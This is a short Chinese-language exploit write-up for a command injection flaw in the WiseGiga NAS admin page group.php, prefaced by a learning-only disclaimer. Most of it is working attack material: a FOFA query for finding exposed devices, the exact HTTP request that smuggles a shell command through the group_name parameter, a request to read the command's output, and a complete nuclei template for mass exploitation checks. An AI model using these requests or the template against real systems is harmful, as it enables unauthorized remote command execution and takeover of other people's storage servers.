免责声明:
本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
漏洞描述
WiseGiga NAS 系统group.php存在任意命令执行漏洞,攻击者可以通过执行任意命令,获取服务器管理权限。
fofa语句
title="WiseGiga"漏洞复现
打开页面
构造payload
请求将命令输出到txt
GET /admin/group.php?memberid=root&cmd=add&group_name=d;id>ohkgsi.txt HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
访问txt,命令执行成功
GET /admin/ohkgsi.txt HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
nuclei批量验证
id: WiseGiga_rce
info:
name: WiseGiga_rce
author: changge
severity: critical
description: WiseGiga NAS 系统group.php存在任意命令执行漏洞,攻击者可以通过执行任意命令,获取服务器管理权限。
metadata:
max-request: 1
fofa-query: title="WiseGiga"
verified: true
tags: rce
variables:
file_name: "{{to_lower(rand_text_alpha(6))}}.txt"
requests:
- raw:
- |-
GET /admin/group.php?memberid=root&cmd=add&group_name=d;id>{{file_name}} HTTP/1.1
Host: {{Hostname}}
- |+
GET /admin/{{file_name}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
req-condition: true
matchers:
- type: dsl
condition: and
dsl:
- 'contains((body_2), "uid=") && status_code_2 == 200'